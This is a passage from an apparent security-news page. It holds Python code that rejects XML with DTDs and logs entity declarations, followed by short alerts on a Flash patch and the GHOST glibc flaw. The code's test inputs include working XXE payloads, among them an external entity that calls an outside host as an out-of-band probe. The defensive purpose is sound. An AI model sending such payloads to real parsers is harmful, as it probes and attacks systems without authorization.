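    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = on_external_ref
    try:
        p.Parse(doc, True)
    except expat.ExpatError:
        pass       # aborted or malformed: declarations seen so far still count
    return findings


def safe_parse(doc: bytes) -> Dict[str, Optional[str]]:
    """Accept only DTD-free documents; return the fields the backend cares about."""
    findings = inspect_dtd(doc)
    if findings:
        raise DtdRejected(findings)
    root = ET.fromstring(doc)
    document = root.find("Document")
    pointer = root.find("Document/DocumentPointer")
    return {"InternalID": document.get("InternalID") if document is not None else None,
            "DocumentPointer": pointer.text if pointer is not None else None}


# Constructed input: the diary's documents with their markup restored.
PLAIN = b"""<DocumentLayer>
  <Document InternalID="1">
    <DocumentPointer>Test</DocumentPointer>
  </Document>
</DocumentLayer>"""

INTERNAL_ENTITY = b"""<!DOCTYPE DocumentLayer [
<!ELEMENT DocumentLayer ANY>
<!ENTITY xxe "Test">
]>
<DocumentLayer>
  <Document InternalID="1">
    <DocumentPointer>&xxe;</DocumentPointer>
  </Document>
</DocumentLayer>"""

EXTERNAL_ENTITY = b"""<!DOCTYPE DocumentLayer [
<!ELEMENT DocumentLayer ANY>
<!ENTITY xxe SYSTEM "http://thisdomaindoesnotexist.infigo.hr/test.txt">
]>
<DocumentLayer>
  <Document InternalID="1">
    <DocumentPointer>&xxe;</DocumentPointer>
  </Document>
</DocumentLayer>"""

if __name__ == "__main__":
    print("plain:", safe_parse(PLAIN))
    for label, doc in (("internal", INTERNAL_ENTITY), ("external", EXTERNAL_ENTITY)):
        try:
            safe_parse(doc)
        except DtdRejected as e:
            print(label, "rejected; log these declarations:", e.findings)
```

Logging the SYSTEM identifier gives the defender the same signal the tester was looking for on the DNS side, without the resolver ever being asked.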

--
Bojan
@bojanz
INFIGO IS


ISC StormCast for Thursday, January 29th 2015 http://isc.sans.edu/podcastdetail.html?id=4333, (Thu, Jan 29th)

Latest Alerts - Wed, 01/28/2015 - 19:34

Adobe Flash Update Available for CVE-2015-0311 & -0312, (Wed, Jan 28th)

Latest Alerts - Wed, 01/28/2015 - 12:23

Adobe has released an update for the Flash vulnerability CVE-2015-0311 discussed earlier this week here on the ISC. The update from Adobe addresses the Flash vulnerabilities documented in CVE-2015-0311 and CVE-2015-0312, which now have exploits being seen in the wild. Given that we are seeing exploits in the wild, the criticality of these vulnerabilities should be re-evaluated when prioritizing and implementing the update.

tony d0t carothers --gmail


GHOST glibc gethostbyname() Vulnerability: https://www.youtube.com/watch?v=218JiCBpUTM, (Wed, Jan 28th)

Latest Alerts - Wed, 01/28/2015 - 08:01

ISC StormCast for Wednesday, January 28th 2015 http://isc.sans.edu/podcastdetail.html?id=4331, (Wed, Jan 28th)

Latest Alerts - Wed, 01/28/2015 - 07:43